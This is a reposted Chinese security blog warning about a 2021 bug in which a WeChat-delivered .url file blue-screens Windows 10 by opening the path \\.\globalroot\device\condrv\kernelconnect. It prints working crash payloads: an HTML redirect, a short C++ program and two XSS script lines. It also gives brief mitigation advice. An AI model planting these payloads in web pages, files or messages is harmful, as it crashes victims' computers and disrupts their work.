红色警戒!Windows微信蓝屏文件刨析!

admin 2021年1月21日09:29:05评论273 views字数 867阅读2分53秒阅读模式

转载自开普勒安全团队

样本

红色警戒!Windows微信蓝屏文件刨析!


核心代码为:file:///globalroot/device/condrv/kernelconnect

受灾画面:

红色警戒!Windows微信蓝屏文件刨析!

红色警戒!Windows微信蓝屏文件刨析!

红色警戒!Windows微信蓝屏文件刨析!

分析:

红色警戒!Windows微信蓝屏文件刨析!


.url文件

url格式的文件是一种网页文件,只要接触就会触发访问

漏洞分析见之前发的文章:

Windows10使用浏览器崩溃复现及分析

防护方法:

仅对windows10系统有效,其它系统不受影响

windows微信用户可关闭自动下载

红色警戒!Windows微信蓝屏文件刨析!

更多方式(.html   .exe):

<html><head></head><body>><script>document.location = '\\.\globalroot\device\condrv\kernelconnect';</script></body></html>
// BSOD.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。// #include <iostream>#include <Windows.h> int main(){    WCHAR fileName[] = L"\\.\globalroot\device\condrv\kernelconnect";    WIN32_FILE_ATTRIBUTE_DATA data;    GetFileAttributesEx(fileName, GetFileExInfoStandard, &data);}

吾爱破解大牛分析:

https://www.52pojie.cn/thread-1354077-1-1.html

红色警戒!Windows微信蓝屏文件刨析!

其他利用方式XSS漏洞:

<script>document.location = '\\.\globalroot\device\condrv\kernelconnect';</script>
<script>document.location = 'file://./globalroot/device/condrv/kernelconnect';</script>

请做好个人防护!谨防漏洞威胁!


关注我们
红色警戒!Windows微信蓝屏文件刨析!
红色警戒!Windows微信蓝屏文件刨析!
红色警戒!Windows微信蓝屏文件刨析!

识别二维码,关注我们




本文始发于微信公众号(WhITECat安全团队):红色警戒!Windows微信蓝屏文件刨析!

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年1月21日09:29:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红色警戒!Windows微信蓝屏文件刨析!http://cn-sec.com/archives/247703.html

发表评论

匿名网友 填写信息